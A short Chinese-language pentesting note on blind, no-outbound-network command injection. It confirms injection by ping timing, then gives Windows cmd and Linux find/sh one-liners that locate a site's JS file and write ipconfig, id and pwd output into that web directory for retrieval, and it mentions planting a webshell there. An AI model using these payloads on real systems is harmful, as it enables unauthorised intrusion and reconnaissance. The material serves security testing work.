前言
本文主要講的是無回顯、不出網命令執行測試方法,首先通過大小寫判斷是linux還是win,然后通過命令自動查找目錄寫文件來測試。
這里沒有這種環境就拿一個php的做演示(其實像這種可以直接寫馬在當前目錄)
首先我們通過下面命令和響應包的時間判斷存在命令執行(適用於win linux下使用-c)
ping -n 3 127.0.0.1
ping -n 4 127.0.0.1
然后在網站上找一個名字比較少見特殊的js(如果網站有上傳圖片的地方可以用你上傳圖片的名字)
windows下的測試方式
執行下面命令自動查找bsa.js並在其目錄寫入文件(由於可能不知道是什么盤可能需要多次嘗試)
cmd /c "for /f %i in ('dir /s /b e:bsa.js') do (echo %i> %i.path.txt)%26(ipconfig > %i.ipconfig.txt)"
在 http://www.test.com/js/ 目錄下訪問 bsa.js.ipconfig.txt bsa.js.path.txt查看執行ifconfig的結果和路徑
linux下的測試方式
使用下面的命令,自動查找bas.js並在其目錄下生成test.txt寫入id pwd ifconfig命令的結果
find / -name bas.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done
